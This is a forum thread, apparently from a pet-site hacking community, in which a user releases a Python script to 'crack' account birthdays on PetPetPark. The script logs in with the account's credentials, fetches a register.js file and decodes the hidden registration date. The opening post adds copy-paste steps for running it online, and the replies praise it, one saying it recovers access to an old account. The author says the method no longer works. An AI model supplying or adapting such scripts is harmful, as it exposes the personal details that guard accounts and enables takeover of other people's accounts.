Page 1 of 5 123 ... LastLast
Results 1 to 10 of 48

Thread: [Release] How to crack birthdays

  1. #1
    JiB's Avatar
    Joined
    Jul 2014
    Posts
    63
    Userbars
    1
    Thanks
    19
    Thanked
    108/16
    DL/UL
    20/5
    Mentioned
    32 times
    Time Online
    6d 13h 38m
    Avg. Time Online
    2m

    [Release] How to crack birthdays

    NOTE: METHOD NO LONGER WORKS DUE TO REMOVAL OF PETPETPARK; THIS GUIDE WILL REMAIN UP FOR EDUCATIONAL PURPOSES


    Gonna reveal the method I've been using since it's being patched tomorrow (or soon after)
    Code:
    import datetime,urllib,urllib2,cookielib,re,sys
    from datetime import date, timedelta
    from threading import *
    
    def post(url,values):
        data = urllib.urlencode(values)
        opener.open(url,data)
    
    caj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(caj))
    opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),]
    
    
    loginData = {'username' : "USERNAME", 'password' : "PASSWORD"}
    url = "http://www.petpetpark.com/services/auth"
    post(url,loginData)
    
    page = opener.open("http://www.petpetpark.com/data/user/register.js")
    
    code = page.read()
    bday = re.findall("new Date\((.+?)\),",code)
    
    try:
        num = int(bday[0])
    except:
        sys.exit("Cannot crack birthday")
    
    num = float(num) / 24 / 60 / 60 / 1000
    
    start = "01/01/70"
    Date = datetime.datetime.strptime(start, "%m/%d/%y").date()
    
    print "Birthday: " + (Date + timedelta(days=num)).strftime('%b %d, %Y')
    Updated for people who don't have python.
    Step 1: Copy the script.
    Step 2: Open (you need an account to see links) and delete all the text on the left textbox, then paste it on the left textbox.
    Step 3: Replace USERNAME and PASSWORD with the username and password of the account (don't delete the quotation marks).
    Step 4: Press Execute Script at the top left corner of the page
    Step 5: The birthday will appear on the right hand side, if it can't crack it, it will say Cannot Crack Birthday


    Don't mind how sloppy it is, feel free to learn from it if you can haha.
    Did some http sniffing with Charles (that's the name of the program I used) and came across the register.js, took a couple hours and a basic knowledge of math to figure out the rest.
    ONLY WORKS FOR ACCOUNTS THAT AREN'T REGISTERED ON PETPETPARK
    Goodluck friends
    Last edited by JiB; 09-19-2014 at 12:56 AM.

  2. The Following 51 Users Say Thank You to JiB For This Useful Post:

    |2eap (09-15-2014),5252 (09-15-2014),Accelerator (09-15-2014),Aura (09-15-2014),Ban (09-15-2014),Bane (09-15-2014),BarCode (09-15-2014),BEDDOEDv (09-15-2014),blastoise (09-15-2014),boringbats (09-24-2014),Brittanee (09-15-2014),cadet (09-30-2014),Cal (09-18-2014),Carrotini (09-28-2014),Cath (09-15-2014),Charlie (09-15-2014),Cheetah (09-15-2014),Cub (09-16-2014),Daviid (03-02-2016),Demetri (09-15-2014),Doset (09-15-2014),Dude (09-16-2014),Fleur (09-15-2014),Garchomp (09-15-2014),hissi (09-15-2014),Jager (09-15-2014),Lindsay (09-15-2014),looklook123123 (09-15-2014),Maison (09-15-2014),Maki (09-15-2014),Marvel (09-16-2014),Meepit (09-15-2014),Mizk (09-15-2014),My name is Yoshikage Kira (09-15-2014),npm (09-15-2014),osiyo (09-17-2014),parakeet (09-15-2014),PiSquared (09-15-2014),Poem (09-15-2014),pollysaid (09-15-2014),purekilla (09-15-2014),Pyre (09-15-2014),Quackers (09-15-2014),Rue (09-16-2014),SabiSweaters (09-15-2014),Sakuras (09-18-2014),Smurf (09-15-2014),Sociopath (09-15-2014),Sprite (09-15-2014),Veronica (09-17-2014),xb1nh0 (09-29-2014)

  3. #2

    Joined
    Jul 2014
    Posts
    124
    Thanks
    15
    Thanked
    28/7
    DL/UL
    53/0
    Mentioned
    25 times
    Time Online
    4d 19h 10m
    Avg. Time Online
    1m
    This really works?

  4. #3


    VultureRoxie's Avatar
    Joined
    Sep 2013
    Posts
    325
    Userbars
    5
    Thanks
    94
    Thanked
    83/50
    DL/UL
    23/0
    Mentioned
    25 times
    Time Online
    14d 22h 37m
    Avg. Time Online
    5m
    I wish i knew how to use it lol

  5. #4
    JiB's Avatar
    Joined
    Jul 2014
    Posts
    63
    Userbars
    1
    Thanks
    19
    Thanked
    108/16
    DL/UL
    20/5
    Mentioned
    32 times
    Time Online
    6d 13h 38m
    Avg. Time Online
    2m
    it's a python script, and yes it works

  6. #5
    Accelerator's Avatar
    Joined
    Jul 2013
    Posts
    4,995
    Userbars
    26
    Thanks
    1,986
    Thanked
    3,789/1,696
    DL/UL
    178/0
    Mentioned
    744 times
    Time Online
    335d 1h 18m
    Avg. Time Online
    2h 2m
    Quote Originally Posted by Madrox View Post
    I wish i knew how to use it lol
    Download and install python.
    Copy the code to a notepad save it as name.py and run it (Only works if you know the password of the account) "name" can be whatever you want XD

    (you need an account to see links)
    (you need an account to see links)
    (you need an account to see links)
    (you need an account to see links)

    "Date et dabitur vobis"
    「Let's fight 恐れはない」


    "A quantum supercomputer calculating for a thousand years could not even approach the number of f��ks I do not give"

    「君が望むモノは何?」

  7. The Following User Says Thank You to Accelerator For This Useful Post:

    JiB (09-15-2014)

  8. #6
    JiB's Avatar
    Joined
    Jul 2014
    Posts
    63
    Userbars
    1
    Thanks
    19
    Thanked
    108/16
    DL/UL
    20/5
    Mentioned
    32 times
    Time Online
    6d 13h 38m
    Avg. Time Online
    2m
    Quote Originally Posted by Accelerator View Post
    Download and install python.
    Copy the code to a notepad save it as name.py and run it (Only works if you know the password of the account) "name" can be whatever you want XD
    Updated it so even people without python can run it, should be idiot proof I hope haha

  9. The Following User Says Thank You to JiB For This Useful Post:

    Accelerator (09-15-2014)

  10. #7
    Accelerator's Avatar
    Joined
    Jul 2013
    Posts
    4,995
    Userbars
    26
    Thanks
    1,986
    Thanked
    3,789/1,696
    DL/UL
    178/0
    Mentioned
    744 times
    Time Online
    335d 1h 18m
    Avg. Time Online
    2h 2m
    Quote Originally Posted by JiB View Post
    Updated it so even people without python can run it, should be idiot proof I hope haha
    Nice find! Didn't know you could upload a python script and run it from a website XD

    (you need an account to see links)
    (you need an account to see links)
    (you need an account to see links)
    (you need an account to see links)

    "Date et dabitur vobis"
    「Let's fight 恐れはない」


    "A quantum supercomputer calculating for a thousand years could not even approach the number of f��ks I do not give"

    「君が望むモノは何?」

  11. #8
    BEDDOEDv's Avatar
    Joined
    Jul 2012
    Posts
    664
    Userbars
    3
    Thanks
    182
    Thanked
    109/53
    DL/UL
    106/0
    Mentioned
    32 times
    Time Online
    7d 10h 26m
    Avg. Time Online
    2m
    things just got better
    i luv. i said i luv to hack


    Avatar Ss List (you need an account to see links)

  12. #9


    VultureRoxie's Avatar
    Joined
    Sep 2013
    Posts
    325
    Userbars
    5
    Thanks
    94
    Thanked
    83/50
    DL/UL
    23/0
    Mentioned
    25 times
    Time Online
    14d 22h 37m
    Avg. Time Online
    5m
    Wow that is impressive I can finally get into my old side again thanks

  13. #10

    Joined
    May 2013
    Posts
    114
    Userbars
    8
    Thanks
    146
    Thanked
    29/26
    DL/UL
    32/0
    Mentioned
    41 times
    Time Online
    30d 16h 2m
    Avg. Time Online
    11m
    Thanks for this! <3
    Last edited by PiSquared; 09-15-2014 at 02:56 AM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •